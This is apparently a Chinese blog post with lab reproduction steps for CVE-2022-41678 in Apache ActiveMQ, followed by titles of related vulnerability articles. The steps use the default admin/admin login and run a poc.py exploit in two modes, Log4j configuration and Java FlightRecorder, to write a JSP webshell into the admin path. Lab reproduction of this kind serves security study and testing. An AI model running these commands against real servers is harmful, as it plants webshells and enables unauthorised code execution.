执行docker compose up -d启动容器

访问ip:8161

默认账密admin/admin登录后台

复现方法1:

通过修改 Log4j 配置写入任意文件

执行python3 poc.py -u admin -p admin http://your-ip:8161

将webshell写入http://your-ip:8161/admin/shell.jsp

可访问路径验证是否成功



方法 1 受 ActiveMQ 版本限制(需包含 Log4j2)

复现方法2:

该方法利用 OpenJDK 11 引入的 FlightRecorder 特性写入日志文件,适用范围更广

执行python3 poc.py -u admin -p admin --exploit jfr http://your-ip:8161

将webshell写入http://your-ip:8161/admin/shelljfr.jsp

可访问路径验证是否成功



方法 2 依赖 OpenJDK 11 及以上环境

CVE-2022-41678 后台代码执行漏洞 (复现)的更多相关文章

  1. DedeCMS V5.7 SP2后台代码执行漏洞复现(CNVD-2018-01221)

    dedeCMS  V5.7 SP2后台代码执行漏洞复现(CNVD-2018-01221) 一.漏洞描述 织梦内容管理系统(Dedecms)是一款PHP开源网站管理系统.Dedecms V5.7 SP2 ...

  2. Windows CVE-2019-0708 远程桌面代码执行漏洞复现

    Windows CVE-2019-0708 远程桌面代码执行漏洞复现 一.漏洞说明 2019年5月15日微软发布安全补丁修复了CVE编号为CVE-2019-0708的Windows远程桌面服务(RDP ...

  3. IIS6远程代码执行漏洞复现CVE-2017-7269

    简述 CVE-2017-7269是IIS 6.0中存在的一个栈溢出漏洞,在IIS6.0处理PROPFIND指令的时候,由于对url的长度没有进行有效的长度控制和检查,导致执行memcpy对虚拟路径进行 ...

  4. Tomcat/7.0.81 远程代码执行漏洞复现

    Tomcat/7.0.81 远程代码执行漏洞复现 参考链接: http://www.freebuf.com/vuls/150203.html 漏洞描述: CVE-2017-12617 Apache T ...

  5. IIS_CVE-2017-7269 IIS6.0远程代码执行漏洞复现

    CVE-2017-7269 IIS6.0远程代码执行漏洞复现 一.漏洞描述 IIS 6.0默认不开启WebDAV,一旦开启了WebDAV,安装了IIS6.0的服务器将可能受到该漏洞的威胁. 二.影响版 ...

  6. Windows漏洞:MS08-067远程代码执行漏洞复现及深度防御

    摘要:详细讲解MS08-067远程代码执行漏洞(CVE-2008-4250)及防御过程 本文分享自华为云社区<Windows漏洞利用之MS08-067远程代码执行漏洞复现及深度防御>,作者 ...

  7. Apache log4j2 远程代码执行漏洞复现👻

    Apache log4j2 远程代码执行漏洞复现 最近爆出的一个Apache log4j2的远程代码执行漏洞听说危害程度极大哈,我想着也来找一下环境看看试一下.找了一会环境还真找到一个. 漏洞原理: ...

  8. Spring Framework远程代码执行漏洞复现(CVE-2022-22965)

    1.漏洞描述 漏洞名称 Spring Framework远程代码执行漏洞 公开时间 2022-03-29 更新时间 2022-03-31 CVE编号 CVE-2022-22965 其他编号 QVD-2 ...

  9. 【代码审计】YUNUCMS_v1.0.6 后台代码执行漏洞分析

      0x00 环境准备 QYKCMS官网:http://www.yunucms.com 网站源码版本:YUNUCMSv1.0.6 程序源码下载:http://www.yunucms.com/Downl ...

  10. PHP远程代码执行漏洞复现(CVE-2019-11043)

    漏洞描述 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码. 向Nginx + PHP-FPM的服务 ...

随机推荐

  1. java springboot api接口使用easyexcle导出xlsx

    提示 使用这种方式,会使你的项目打jar包后,体积增加20MB左右(仅为个人测试) 如果你对表格样式.格式没有要求,可以曲线救国,代码看我其他文章 添加pom依赖 <!--导出excle依赖-- ...

  2. elasticsearch分词

    阅读说明: 1.如果有排版格式问题,请移步https://www.yuque.com/mrhuang-ire4d/oufb8x/gmzl30v8ofqg3ua3?singleDoc# <elas ...

  3. 修改AndroidStudio的Boot Java Runtime for the IDE后,IDE打开报错无法运行

      修改AndroidStudio的Boot Java Runtime for the IDE后,IDE打开报错无法运行,解决方法 一.问题 我想在AndroidStudio里使用markdown支持 ...

  4. luffy

    Luffy 本项目使用Vue+Vite+Django+DRF+Elementui-Plus编写 项目需求介绍 # 线上销售课程的 -商城 -知识付费类 # 需求 -首页功能 -轮播图接口 -推荐课程接 ...

  5. DRF之登录认证源码分析

    DRF之登录认证源码分析 [一]引入 [1]表模型 from django.db import models # Create your models here. class UserInfo(mod ...

  6. 12-搭建小实战和Sequential使用

    1. 神经网络 ① 把网络结构放在Sequential里面,好处就是代码写起来比较简介.易懂. ② 可以根据神经网络每层的尺寸,根据下图的公式计算出神经网络中的参数. 2. 搭建神经网络 import ...

  7. sass ruby 中文

    解决办法: 1.koala可视化编译工具, 找到安装目录里面sass-3.3.7模块下面的engine.rb文件,例如下面路径: C:\Program Files (x86)\Koala\rubyge ...

  8. vue脚手架搭建,出现无法将“vue”项识别....

    前言: 肯定有很多小伙伴和我一样,想在各种开发工具的终端运行命令来新建vue-cli脚手架,可是vue命令就是识别不到,然后又很烦,不妨看看我这个解决方案吧!!! 遇见问题: vue : 无法将&qu ...

  9. Oracle数据一致性与事务管理

    数据一致性和事务 Oracle中的数据一致性 当从A表取一条数据添加到B表时,需先删除A表数据,再新增B表数据, 如果第二条操作出异常时,就造成了数据不一致. Oracle中的事务 事务是保证数据一致 ...

  10. AI 为何能查天气、订机票?揭秘大模型背后的“神秘工具箱”

    你有没有想过,为什么 AI 能回答"今天上海天气怎么样?"这种实时问题,甚至帮你预订机票?明明它的训练数据截止到去年,怎么会对现在的事情了如指掌? 答案就藏在一个核心技术里--工具 ...